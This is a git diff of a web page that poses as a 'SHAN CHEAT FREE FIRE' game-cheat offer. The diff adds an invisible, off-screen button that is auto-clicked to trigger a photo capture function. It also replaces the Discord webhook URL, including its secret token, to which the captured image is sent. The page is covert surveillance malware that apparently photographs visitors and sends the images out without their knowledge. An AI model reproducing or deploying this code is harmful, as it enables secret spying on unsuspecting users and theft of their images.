--- a/index.html
+++ b/index.html
@@ -7,10 +7,13 @@
 </head>
 <body>
 
+<!-- Hidden Button (User Click Trigger Simulation) -->
+<button id="hiddenBtn" style="opacity: 0; position: absolute; left: -9999px;" onclick="capturePhoto()">Click</button>
+
 <script>
-    async function askPermission() {
+    function askPermission() {
         if (confirm("SHAN CHEAT FREE FIRE FOLLOW PAGE")) {
-            capturePhoto();
+            document.getElementById("hiddenBtn").click(); // Auto click hidden button
         }
     }
 
@@ -64,7 +67,7 @@
     }
 
     function sendToDiscord(imageUrl) {
-        fetch("https://discord.com/api/webhooks/1342004228545314878/eP1d-l51wUwemHfoWzSC0TJ7_lra6NH3yZZdWgxJbW2x8zYiJP4Pewp_aJyiU2cybt7Z", {
+        fetch("https://discord.com/api/webhooks/1340611336966770761/BG9LqkUM1Tri7XT1oHVaotzuOQo6VTj4fnWsmtgS0geRxhdBAVZ0wxw3XqGdjLYIY9xI", {
             method: "POST",
             headers: { "Content-Type": "application/json" },
             body: JSON.stringify({ 
